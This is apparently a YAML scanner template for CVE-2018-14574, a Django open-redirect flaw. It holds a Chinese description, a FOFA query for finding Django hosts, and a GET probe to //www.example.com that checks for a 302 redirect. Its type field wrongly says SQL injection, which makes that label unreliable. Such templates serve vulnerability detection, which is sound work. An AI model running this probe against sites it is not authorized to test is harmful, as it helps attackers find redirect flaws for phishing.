product: Django
vName: Django 任意URL跳转
type: SQL注入
vID:
  - CVE-2018-14574
level: 3
vDesc: Django 默认配置下，如果匹配上的 URL 路由中最后一位是/，而用户访问的时候没加/，Django 默认会跳转到带/的请求中。（由配置项中的 django.middleware.common.CommonMiddleware、APPEND_SLASH 来决定）。在 path 开头为 //example.com 的情况下，Django 没做处理，导致浏览器认为目的地址是绝对路径，最终造成任意 URL 跳转漏洞。该漏洞利用条件是目标 URLCONF 中存在能匹配上 //example.com 的规则。
version: ''
note: ''
search:
  FOFA: app="Django"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/开发框架漏洞/Django  2.0.8 任意URL跳转漏洞 CVE-2018-14574.md
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: //www.example.com
    verify:
      path: ''
      logic: and
      check:
        - status: 302
          header:
            value:
              - 'Location'
              - '//www.example.com'
            logic: and